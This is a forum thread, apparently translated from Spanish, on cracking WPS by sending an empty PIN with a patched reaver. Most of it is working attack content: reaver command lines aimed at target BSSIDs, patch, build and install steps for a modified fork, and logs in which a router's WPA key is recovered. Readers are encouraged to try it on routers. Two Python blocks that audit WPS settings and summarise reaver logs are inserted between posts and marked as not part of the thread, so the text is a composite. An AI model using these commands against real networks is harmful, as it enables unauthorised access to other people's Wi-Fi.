Crack WPS by sending a "blank" (null) PIN (Page 1) / General questions and search for new breaches / Wifi-libre.com Forum


#1 30-03-2017 11:31:36

kcdtv
Administrator

Registered: 14-11-2014
Posts: 3,196

Crack WPS by sending a "blank" (null) PIN

WPS crack on a Huawei HG658c with a blank PIN

[image: WPS_empty_PIN_5.jpg]

binarymaster from the antichat.ru forum has pointed us to a singular case in this "issue" on the GitHub branch of reaver 1.5.3:

[image: WPS_empty_PIN_1_20170330-1137.jpg]

He talks about two things:
  - Routers that use a "non-conforming" PIN (one that does not respect the WPS checksum rule).
A case we know well in Spain with the Amper ASL-26555 routers, whose default ESSID is of the WLAN_XXXX type and whose BSSID starts with 8C:0C:A3.
  - He also cites a very peculiar case observed on a Huawei HG658c and points us to this article:

Let's look together at what is going on with this business of "sending an empty PIN".
The article is not tremendously documented, but the sequence of events can be followed without any problem.

A few words about the HG658c... It's a Huawei box very similar to... a Huawei box. :D

[image: WPS_empty_PIN_3.jpg]

It's used in Ireland, I don't know with which ISP, and probably in other places too.
You can see on the label that it has no WPS PIN (at least they don't print one).

[image: WPS_empty_PIN_2.jpg]

The device's web management interface is very (too) minimalist:

[image: WPS_empty_PIN_4.jpg]

There is a button to enable and disable WPS "globally", and then you can choose between PBC and PIN.
In this case the router is in PBC mode.
The author of the article (I think his nick is James Bond, but I'm not sure) then starts a brute-force attack.
Here you can see the stdout (unfortunately without the maximum "verbose" level):

[email protected]:~/reaver/new/src# reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] Trying pin 33335674.
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] 0.05% complete. Elapsed time: 0d0h0m16s.
[+] Trying pin 44445676.
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] Trying pin 55555678.
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] Trying pin 66665670.
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Session saved.

The attack advances until it triggers a WPS lockout.
Ten PINs were tested: WPS in PIN mode is enabled.
This aroused the curiosity of our friend James Bond (or whatever his name is).
He connected to the access point's SERIAL ports to open a session with the ATP command interpreter:

Connected to 192.168.1.1.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------

Login: !!Huawei
Password: 
ATP>sh


BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

He was able to check the value assigned to the WPS PIN.

# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=

You can see that no value is defined.
A "blank" PIN: its value is "NULL".
WPS in PIN mode is enabled, but the PIN is not defined.

So he modified reaver with a patch to be able to try an empty PIN.
The empty PIN is sent with the new option ( -B ):

[email protected]:~/reaver# git clone https://github.com/t6x/reaver-wps-fork-t6x.git reaver
[email protected]:~/reaver# cd reaver
[email protected]:~/reaver/reaver# patch -p1 < ../emptystringpin.diff 
[email protected]:~/reaver/reaver# cd src/
[email protected]:~/reaver/reaver/src# ./configure ; make
[email protected]:~/reaver/reaver/src# ./reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v -B


Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretWifiPassword'
[+] AP SSID: 'vodafone-XXXX'

It's not very clear because he didn't modify reaver's output.
What the patch does is overwrite the PIN 12345670 with an empty string.
The PIN sent has no defined value and the router.... hands over the key. :roll:

It's a very interesting case: many WPS interfaces require a PIN to be defined in addition to enabling WPS.
It's quite possible to run into a router with WPS enabled and no PIN defined.
Either because the user left it that way or because it ships that way from the factory.

I immediately thought of the Jazztel ZTE routers.
You know, their WPS is a bit odd: it's disabled without being completely disabled.
I tried and it gave no results.
More tests are needed on routers configured with WPS enabled and no PIN defined,
to see whether it's a method we can apply generally or whether it only works with certain chipsets/firmware/devices.

In any case it's a new avenue to explore. 8)
If you want to run tests, I recommend using binarymaster's modification rather than the patch proposed on the blog.
You can install it like this:

 git clone https://github.com/binarymaster/reaver-wps-fork-t6x.git
 cd reaver-wps-fork-t6x
 cd src
 ./configure
 make
 sudo make install

To run the attack with an empty PIN you must use the -X argument.
I advise adding the -n option, just in case.
Something like this:

sudo reaver -i <interfaz> -b <bssid_objetivo> -c <canal> -X -n -vvv

This is only good for trying an empty PIN.
If it doesn't work, you must stop the attack and start another one without the -X option if you want to continue with a conventional brute-force attack.

Offline
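The two conditions this post raises, a PIN that breaks the WPS checksum rule and WPS PIN mode left enabled with no PIN defined at all (the empty wps_device_pin in the HG658c nvram dump), can both be checked from the device's own configuration. The following is an added example, not code from the thread, from reaver or from Huawei firmware. The checksum is the public WPS rule (the eighth digit makes the weighted sum of the first seven a multiple of 10). Only the key wps_device_pin comes from the thread; wps_enable, wps_mode and the sample dumps are constructed assumptions.

```python
"""Audit a router's WPS configuration for two conditions: a PIN that breaks the
WPS checksum rule, and WPS PIN mode enabled with no PIN defined at all.

Added example, not code from the thread, from reaver or from Huawei firmware.
Only wps_device_pin is taken from the thread's nvram output; the keys
wps_enable and wps_mode and the sample dumps are constructed assumptions.
"""
import re


def wps_checksum_digit(first_seven: str) -> int:
    """Check digit for a 7-digit PIN body: digits 1, 3, 5, 7 weigh 3, digits
    2, 4, 6 weigh 1, and the check digit brings the total to a multiple of 10."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    total = sum(int(ch) * (3 if i % 2 == 0 else 1)
                for i, ch in enumerate(first_seven))
    return (10 - total % 10) % 10


def classify_pin(pin: str) -> str:
    """'empty', 'malformed', 'conforming' (checksum holds) or 'non-conforming'."""
    if pin == "":
        return "empty"
    if len(pin) != 8 or not pin.isdigit():
        return "malformed"
    expected = wps_checksum_digit(pin[:7])
    return "conforming" if int(pin[7]) == expected else "non-conforming"


NVRAM_LINE = re.compile(r"^(?P<key>\w+)=(?P<value>.*)$")


def parse_nvram(dump: str) -> dict:
    """Turn 'key=value' lines from an `nvram show` style dump into a dict.
    Header lines such as 'size: ... bytes' carry no '=' and are skipped."""
    values = {}
    for line in dump.splitlines():
        match = NVRAM_LINE.match(line.strip())
        if match:
            values[match.group("key")] = match.group("value")
    return values


def audit_wps(nv: dict) -> list:
    """Return findings (strings) for a parsed dump; an empty list means clean."""
    findings = []
    enabled = nv.get("wps_enable") == "1"             # assumed key name
    pin_mode = nv.get("wps_mode") in ("pin", "both")   # assumed key and values
    kind = classify_pin(nv.get("wps_device_pin", ""))
    if not enabled:
        return findings
    if pin_mode and kind == "empty":
        findings.append("WPS PIN mode enabled but wps_device_pin is empty: "
                        "disable PIN mode or set a PIN")
    elif kind == "non-conforming":
        findings.append("wps_device_pin fails the WPS checksum rule")
    elif kind == "malformed":
        findings.append("wps_device_pin is not an 8-digit PIN")
    return findings


# Constructed sample dumps; the first mirrors the thread's HG658c output.
DUMP_EMPTY_PIN = """size: 2659 bytes (30109 left)
wps_enable=1
wps_mode=both
wps_device_pin=
"""
DUMP_OK = """wps_enable=1
wps_mode=pbc
wps_device_pin=12345670
"""
DUMP_BAD_CHECKSUM = """wps_enable=1
wps_mode=pin
wps_device_pin=12345678
"""

if __name__ == "__main__":
    for name, dump in [("empty pin", DUMP_EMPTY_PIN), ("ok", DUMP_OK),
                       ("bad checksum", DUMP_BAD_CHECKSUM)]:
        print(name, "->", audit_wps(parse_nvram(dump)) or ["no findings"])
```

The ten PINs reaver tried in the first log above (12345670, 00005678, ...) all pass `classify_pin` as conforming, which is why a router with a non-conforming factory PIN, like the Amper case mentioned in the post, is never reached by a checksum-respecting brute force; the empty-PIN case is the opposite failure, where the PIN is not malformed but simply absent.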


#2 30-03-2017 11:48:49

Koala
Very Important User

Registered: 11-09-2016
Posts: 375

Re: Crack WPS by sending a "blank" (null) PIN

By default WPS is enabled with PBC? :D


There are things I don't understand.. it's been known for a while now that WPS has a vulnerability and they leave it enabled.. how many networks in Spain also have WPS enabled by default?

Offline

#3 30-03-2017 12:21:35

kcdtv
Administrator

Registered: 14-11-2014
Posts: 3,196

Re: Crack WPS by sending a "blank" (null) PIN

Koala wrote:
> By default WPS is enabled with PBC? :D

Exactly.
WPS enabled with PBC mode and PIN mode.
The thing is, they don't define a PIN.
That leaves WPS in PIN mode "neither here nor there".

Koala wrote:
> There are things I don't understand.. it's been known for a while now that WPS has a vulnerability and they leave it enabled.. how many networks in Spain also have WPS enabled by default?

Many. Not to say almost all.
It must also be said that almost all of them have WPS lockout.
But they still leave open the possibility of finding an algorithm, a generic PIN or a new breach, and of being able to exploit it.
The only ISP that has really done something radical about it is Jazztel.
They "broke" WPS in PIN mode with a general firmware update of their routers.
The other carriers limit themselves to having WPS lockout enabled.

Offline

#4 30-03-2017 17:50:57

Patcher
Very Important User

Registered: 14-01-2016
Posts: 325

Re: Crack WPS by sending a "blank" (null) PIN

I had been meaning to ask you about this, because they also reported it to me from antichat.ru so that I would implement it in waircut. I wasn't sure whether it was a troll; I see it isn't, so I'll put it in waircut too.

Offline

#5 30-03-2017 21:01:18

kcdtv
Administrator

Registered: 14-11-2014
Posts: 3,196

Re: Crack WPS by sending a "blank" (null) PIN

I don't think it's a troll... That said: documentation is lacking and I can't guarantee it either...
I've looked at the other entries on this blog and you can see there is serious work on this router.
It would be great to have a router that could be left with the PIN unconfigured... I've looked at quite a few and couldn't.
I also tried with the PIN "GIVEkey" :D

[image: Seleccion_373.png]

It didn't work... :P :D

I'll leave you here the stdout done from the antichat forum:

[email protected]:~# ./reaver -i wlan0mon -b D4:76:EA:хх:хх:хх -c 6 -v -N -B "" -vvv

Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

[+] Switching wlan0mon to channel 6
[?] Restore previous session for D4:76:EA:хх:хх:хх? [n/Y] n
[+] Waiting for beacon from D4:76:EA:хх:хх:хх
[+] Associated with D4:76:EA:хх:хх:хх (ESSID: ROSTELECOM-хх)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 8 seconds
[+] WPS PIN: ''
[+] Nothing done, nothing to save.

And another one done in "--debug" mode:

[email protected]:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N

Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from D4:76:EA:xx:xx:xx
[+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=0):
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin ""
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
WPS: Processing received message (len=539 op_code=4)
WPS: Received WSC_MSG
WPS: attr type=0x104a len=1

.................................

[+] Received M5 message
WPS: Processing received message (len=158 op_code=4)
WPS: Received WSC_MSG
WPS: attr type=0x104a len=1
WPS: attr type=0x1022 len=1
WPS: attr type=0x1039 len=16
WPS: attr type=0x1018 len=112
WPS: attr type=0x1005 len=8
WPS: Parsed WSC_MSG
WPS: Received M7
WPS: Unexpected state (12) for receiving M7
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M7 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
[+] Pin cracked in 15 seconds
[+] WPS PIN: ''
[+] Nothing done, nothing to save.
WPS: Full PIN information revealed and negotiation failed
WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4d

In the end the blank PIN is cracked, but it doesn't allow obtaining the key.
Unfortunately he doesn't give details about his router and its configuration.
see: Уязвимость в протоколе Wi-Fi Protected Setup (Vulnerability in the Wi-Fi Protected Setup protocol)

Offline
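The two stdout captures above end with "Pin cracked" and an empty WPS PIN but no WPA PSK line, while the capture in the first post ends with a PSK; telling those outcomes apart from a long verbose log is easier with a small summariser. The following is an added example, not code from the thread, from reaver or from binarymaster's fork. It reads the "Trying pin", "Received M<n> message", "Sending WSC NACK", "WPS PIN:" and "WPA PSK:" lines reaver prints and reports how far the exchange got. The interpretation follows the WPS registration protocol: the AP (enrollee) only sends M5 after the first half of the PIN has been accepted, and M7, the message that carries the credentials, only after the second half has. The log excerpts are constructed from the thread's own output.

```python
"""Summarise how far a WPS exchange got from reaver's verbose log.

Added example; not part of the thread, of reaver or of binarymaster's fork.
Reads reaver's progress lines and reports which PIN half the AP accepted and
whether a key was actually returned. Per the WPS registration protocol, M5 from
the AP means the first PIN half was accepted and M7 (the message that would
carry the credentials) means the second half was accepted.
"""
import re

TRYING = re.compile(r"Trying pin (\S+)")
RECEIVED = re.compile(r"Received M(\d) message")
NACK = re.compile(r"Sending WSC NACK")
RATE_LIMIT = re.compile(r"Detected AP rate limiting")
WPS_PIN = re.compile(r"WPS PIN: '(.*)'")
WPA_PSK = re.compile(r"WPA PSK: '(.*)'")


def summarise(log: str) -> dict:
    """Return pins tried, furthest WPS message received from the AP, NACKs
    sent, whether lockout was hit, and the final PIN/PSK result lines."""
    s = {"pins_tried": [], "max_received": 0, "nacks_sent": 0,
         "rate_limited": False, "wps_pin": None, "psk_disclosed": False}
    for line in log.splitlines():
        if m := TRYING.search(line):
            # reaver prints 'Trying pin 12345670.' or 'Trying pin ""'
            s["pins_tried"].append(m.group(1).strip('."'))
        elif m := RECEIVED.search(line):
            s["max_received"] = max(s["max_received"], int(m.group(1)))
        elif NACK.search(line):
            s["nacks_sent"] += 1
        elif RATE_LIMIT.search(line):
            s["rate_limited"] = True
        elif m := WPS_PIN.search(line):
            s["wps_pin"] = m.group(1)
        elif WPA_PSK.search(line):
            s["psk_disclosed"] = True
    s["first_half_accepted"] = s["max_received"] >= 5
    s["second_half_accepted"] = s["max_received"] >= 7
    return s


# Constructed excerpts of the three captures quoted in the thread.
LOG_LOCKOUT = """[+] Trying pin 12345670.
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
"""
LOG_NO_KEY = """[+] Trying pin ""
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 8 seconds
[+] WPS PIN: ''
[+] Nothing done, nothing to save.
"""
LOG_KEY = """[+] Trying pin 12345670.
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretWifiPassword'
[+] AP SSID: 'vodafone-XXXX'
"""

if __name__ == "__main__":
    for name, log in [("lockout", LOG_LOCKOUT), ("no key", LOG_NO_KEY),
                      ("key", LOG_KEY)]:
        print(name, "->", summarise(log))
```

For the antichat capture the summary reads second_half_accepted True with psk_disclosed False: M7 did arrive, but reaver answered it with WSC NACKs instead of finishing the exchange, which matches the "Unexpected state (12) for receiving M7" line in the --debug run.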
